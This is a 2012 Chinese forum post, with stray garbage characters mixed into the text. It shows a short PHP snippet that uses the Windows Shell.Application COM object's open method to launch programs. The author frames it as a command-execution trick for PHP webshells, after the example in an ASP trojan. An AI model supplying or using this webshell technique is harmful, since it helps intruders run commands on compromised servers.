关于用Shell.Application来执行程序,在海阳顶端asp木马里已有示例。用的是ShellExecute 这个方法。5 ^$ \, F0 Z! e/ T/ Y. p% |
0 r. T8 ]1 y q) T今天试了一下,用open也可以。php代码如下,我好像还没有在php的webshell中看到相关方法
2 ^! Z6 J6 L% K5 D0 c9 [5 ?: H% T" \: N8 v% P1 J2 M3 U$ Z& D
<?php
3 M: V2 u! q7 D: @, h, O% Y0 u$wsh = new COM('Shell.Application') or die("Shell.Application");4 G' g0 ]1 }/ g8 I# P
$exec = $wsh->open("c:\\windows\\system32\\notepad.exe");5 A1 y5 w7 T6 K+ R% C9 L
//没有回显,多了个notepad进程,可以写一个批处理来运行dos命令。open换用ShellExecute 也可。$ X0 O) q/ U- ^2 j: l# J: L# R
?>6 U3 E' g& X- C# P9 g. [' v
+ L% O2 |2 V4 P" _
xp+APMServ5.2.0测试通过。# R; R+ p3 M* J& ~) r' w' p
|
发表于 2012-9-15 14:29:01
收藏
支持
反对